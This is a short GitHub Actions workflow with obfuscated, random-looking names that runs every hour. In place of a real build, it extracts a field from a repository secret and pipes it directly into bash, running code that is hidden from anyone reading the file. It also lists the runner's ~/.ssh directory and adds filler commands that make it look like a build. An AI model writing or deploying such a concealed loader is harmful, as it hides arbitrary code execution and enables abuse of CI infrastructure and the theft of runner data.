name: hugulu9817

on:
  workflow_dispatch:
  schedule:
    - cron: '2 * * * *'
jobs:  # 5986
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: hugulu9817
        env:
          x2154: ${{ secrets.x2154 }}
        run: |
          [ -d "$HOME/.ssh" ] && echo "$(ls -al $HOME/.ssh)" || echo "$HOME/.ssh not exists"
          echo $x2154 | jq -r .x17802 | /bin/bash
          echo "Build $(date +%s)"
          history | grep ls
          pushd ~
          echo "User: $(whoami)"
